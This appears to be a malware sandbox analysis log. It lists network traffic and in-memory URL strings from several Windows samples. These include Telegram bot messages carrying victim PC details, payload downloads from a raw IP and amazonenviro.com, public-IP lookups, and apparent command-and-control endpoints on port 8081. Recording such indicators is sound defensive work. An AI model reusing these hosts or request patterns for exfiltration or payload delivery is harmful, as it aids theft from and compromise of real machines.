Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2007/01/2025%20/%2021:58:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2007/01/2025%20/%2022:17:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /image.exe HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 147.124.216.113
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: amazonenviro.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.techniqueqatar.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 07 Jan 2025 12:25:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 07 Jan 2025 12:25:42 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 07 Jan 2025 12:25:43 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: jphwmyiA.pif, 0000000C.00000002.3444740302.0000000026283000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A55B000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A4CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: jphwmyiA.pif, 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: jphwmyiA.pif, 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3444740302.00000000261D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A3C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: brightness.exe, 00000008.00000002.2212129795.000000000080E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com/
Source: brightness.exe, 00000008.00000002.2228361462.0000000020633000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2212129795.000000000080E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2212129795.0000000000826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsg
Source: brightness.exe, 00000008.00000002.2212129795.0000000000855000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com:80/245_Aiymwhpjxsg
Source: jphwmyiA.pif, 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3444740302.00000000261D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A3C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: jphwmyiA.pif, 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A3C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: jphwmyiA.pif, 0000000C.00000002.3444740302.000000002627F000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3444167534.000000001A451000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3444524206.000000002A3C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: jphwmyiA.pif, 0000000C.00000003.2210977844.0000000024507000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3443379570.0000000025EE9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3443379993.000000001A199000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2330033359.00000000187DC000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3441954113.0000000029FF9000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2406157824.00000000283ED000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3441525726.00000000244F4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000C.00000002.3451586724.000000002893C000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3452191252.000000001D6AF000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732557349.000000002D31A000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732597157.000000002D340000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732629706.000000002D332000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3452062242.000000002D2A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: jphwmyiA.pif, 0000000C.00000002.3441525726.00000000244F4000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000002.3452191252.000000001D642000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732557349.000000002D31A000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000002.3452062242.000000002D2A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: brightness.exe, 00000008.00000003.2199216003.000000007F3EF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2207465458.000000007F3AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230785597.00000000214AA000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2206791912.0000000021427000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2231404841.00000000215F2000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232007845.0000000021700000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, jphwmyiA.pif.8.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: jphwmyiA.pif, 00000014.00000003.2732557349.000000002D31A000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2732597157.000000002D340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectig
Source: brightness.exe, 00000008.00000002.2228361462.0000000020510000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2200013988.0000000000874000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2230547224.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000008.00000002.2232389580.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000008.00000003.2199559053.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002460000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000003.2318831229.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2359054584.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000D.00000002.2330274971.0000000002534000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
